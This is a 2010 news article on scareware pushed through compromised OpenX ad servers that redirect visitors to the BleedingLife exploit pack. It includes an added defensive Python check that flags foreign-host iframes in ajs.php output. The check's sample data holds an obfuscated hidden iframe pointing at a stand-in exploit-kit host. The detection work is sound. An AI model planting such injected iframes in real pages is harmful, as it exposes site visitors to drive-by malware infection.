Dec 20, 2010 07:22 GMT
Scareware pushers use compromised OpenX servers to launch drive-by downloads

Scammers behind the new family of scareware programs that pose as hard disk drive defragmentation utilities are using vulnerable OpenX servers to launch drive-by downloads and infect users.

This new attack was spotted by security researchers from Web application security solutions vendor Armorize Technologies, who last week revealed that the same cyber criminals managed to get malicious ads onto Google's and Microsoft's advertising networks.

This piece of scareware goes by different names including "HDD Tools", "HDD Plus", "Ultra Defragger", "Smart Defragmenter", "HDD Defragmenter", "System Defragmenter", "Disk Defragmenter", "Quick Defragmenter", "Check Disk" or "Scan Disk".

The attackers begin by exploiting known vulnerabilities in outdated OpenX ad servers to inject rogue code into the /www/delivery/ajs.php banner serving script.

The code generates an iframe on the public facing pages, which points to an externally hosted instance of the BleedingLife v2 exploit pack.

This toolkit serves exploits for two vulnerabilities in older Flash Player versions, two affecting Adobe Reader, and two affecting Java. "The exploitation success rate is 28%, which is very high," says Armorize CTO Wayne Huang.
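The injection described above is easy to spot once you know what normal ajs.php output looks like: OpenX emits JavaScript that document.write()s banner markup pointing back at the ad server itself, so any iframe or script whose src resolves to a foreign host is a red flag. The following is an added example (not Armorize's or OpenX's code) of such a check; the ajs.php output is constructed for this example and every hostname in it is invented, and it also undoes one layer of percent-encoding because injected markup is frequently hidden behind unescape().

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample of what a compromised ajs.php might return: the legitimate
# OpenX banner markup followed by an injected, percent-encoded hidden iframe.
# All hostnames here are made up for the example.
SAMPLE_AJS_OUTPUT = r"""
var OX_abc = '';
OX_abc += "<a href=\'http://ads.example.test/www/delivery/ck.php?n=a1b2c3\' target=\'_blank\'>";
OX_abc += "<img src=\'http://ads.example.test/www/delivery/avw.php?zoneid=1&n=a1b2c3\' border=\'0\' alt=\'\' /></a>";
document.write(OX_abc);
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit-kit.example.invalid%2Fbl2%2Findex.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'));
"""

# The host(s) the ad server is allowed to load active content from: itself.
ALLOWED_HOSTS = {"ads.example.test"}

# Tags that load and execute remote content; <img>/<a> are the normal banner output.
TAG_SRC_RE = re.compile(
    r"<\s*(iframe|script|embed|object)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)",
    re.I,
)


def normalize(js_text):
    """Undo cheap obfuscation so the markup can be matched as HTML:
    one layer of percent-encoding (the unescape() trick) and JS quote escapes."""
    text = unquote(js_text)
    return text.replace("\\'", "'").replace('\\"', '"')


def find_external_loads(js_text, allowed_hosts):
    """Return (tag, url, host) for every iframe/script/embed/object src that
    points outside the ad server's own host(s). An empty list means clean."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for tag, url in TAG_SRC_RE.findall(normalize(js_text)):
        host = urlparse(url).hostname
        if host is None:  # relative URL: served by the ad server itself
            continue
        if host.lower() not in allowed:
            hits.append((tag.lower(), url, host.lower()))
    return hits


if __name__ == "__main__":
    for tag, url, host in find_external_loads(SAMPLE_AJS_OUTPUT, ALLOWED_HOSTS):
        print(f"suspicious <{tag}> loading {url} from foreign host {host}")
```

In practice you would feed this the response of your own ajs.php for each zone (for example via a scheduled fetch) and alert on any hit; an injected banner script is visible to every visitor but invisible in the OpenX admin UI, so checking the served output rather than the database catches exactly this class of compromise.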

Antivirus detection of these reliably written exploit files is very low on VirusTotal, while detection of the dropped scareware was around 63% at the time of writing this article.

By investigating the payment infrastructure used by the HDD Plus scareware, Armorize researchers managed to link it to one Dmitry Slevin from Moscow.

They even obtained his phone number and called him. He said that he only offers domain services to others and knows nothing of the scareware, but after the discussion, modifications meant to hide his tracks were made to websites involved in this scheme.

"We don't know for what parts of this 'HDD Plus' operation Slevin is responsible, but we're sure he's involved and chose to tell little of what he knows," Mr. Huang concludes.